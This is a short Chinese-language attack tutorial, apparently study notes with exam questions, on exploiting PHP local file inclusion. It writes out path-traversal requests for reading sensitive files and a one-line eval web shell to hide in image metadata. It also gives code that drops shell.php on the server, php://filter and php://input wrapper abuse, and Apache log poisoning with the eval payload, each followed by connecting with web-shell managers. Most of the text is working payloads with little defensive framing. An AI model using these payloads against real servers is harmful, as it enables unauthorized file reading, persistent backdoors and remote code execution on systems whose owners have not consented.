(1) .读取敏感文件
利用文件包含漏洞读取任意文件,读取文件的时候有利用条件
@目标主机文件存在 (目标文件的绝对路径,相对路径)
@具有文件的可读权限
提交参数
绝对路径
?path=c:\路径\
尝试相对路径
?path=..\..\..\..\..\..\路径\
(2) .直接包含图片木马
将木马信息写入图片附加信息中
图片附加信息 版权等.
<?php @eval($_REQUEST[777])?>
使用菜刀连接
(3) .包含木马写shell
我们也可以将如下代码写入到图片中
<?php fputs(fopen('shell.php','w'),
"<?php @eval(\$_REQUEST[777])?>");
?>
改代码含有是,在当前目录下创建一个名为shell.php 文件
使用菜刀连接
http://Ip//shell.php
(4) .PHP封装协议–访问本地文件
allow_url_include=On
?path=file://c:/路径/
(5) .PHP封装协议–传输PHP文件
?path=php://filter/read=convert.base64-encode/resoure
=inc.php
将inc.php文件展示在页面中,利用base64解码可获取内容
(6) .PHP封装协议–执行php命令
在burp包头中
GET /path.php?path=php://input
文本内容执行命令
<?php phpinfo();?>
试题
7 .已知网站存在本地文件包含漏洞,但没有文件上传API(无法上传文件),
如何利用
1.利用网站访问记录日志getshell
构造http请求包头
GET /<?php @eval($_REQUEST[777])?> HTTP/1.1
访问文件包含漏洞
利用蚁剑连接
?path=d:/phpstudy/apache/log/error.log
8 .利用代码自动审计软件
Seay等软件